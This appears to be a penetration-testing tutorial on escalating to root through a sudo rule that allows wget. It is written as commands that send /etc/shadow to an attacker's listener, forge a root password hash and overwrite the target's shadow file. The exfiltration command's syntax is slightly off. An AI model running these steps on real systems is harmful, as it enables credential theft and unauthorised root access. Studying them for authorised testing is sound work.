Sudo Wget Privilege Escalation
The "sudo wget" command may be vulnerable to privilege escalation (PrivEsc).
sudo -l
(root) NOPASSWD: /usr/bin/wget
Copied!If we can execute "wget" as root, we may be able to escalate privileges.
Get "/etc/shadow" and generate a new hash passwd, then set it to the shadow file, next upload it. That changes the root password.
To see the content of /etc/shadow, we can use netcat listener. So First, start a listener in local machine.
nc -lvnp 4444
Copied!In target machine, display the contents of the "/etc/shadow" to the local machine using the following command.
sudo /usr/bin/wget --post-file=/etc/shadow <local-ip> 4444
Copied!We should see the content in our local machine via netcat listener. Copy the content.
We create a new shadow file in local. The shadow file will be stored into the target /etc/shadow later.
vim shadow.txt
Copied!In vim editor (or nano, vi, etc.), paste the content of /etc/shadow which we've copied in the previous section.
Generate a new hash password for a new root user in local machine.
# -6: SHA512
openssl passwd -6 -salt 'salt' 'password'
Copied!Copy the generated password and paste it at the password of the root user into the "shadow.txt". As a result, the contents of the "shadow.txt" should look like this:
root:$6$salt$IxDD...DCy.g.:18195:0:99999:7:::
...
Copied!To put the shadow.txt into the target machine, start web server for hosting this file.
python3 -m http.server 8000
Copied!Download this file into the /etc/shadow in remote machine. To do that, we need to run it as root.
sudo /usr/bin/wget http://<local-ip>:8000/shadow.txt -O /etc/shadow
Copied!Finally, you can switch to the root user with the password we've created.
su rootLast updated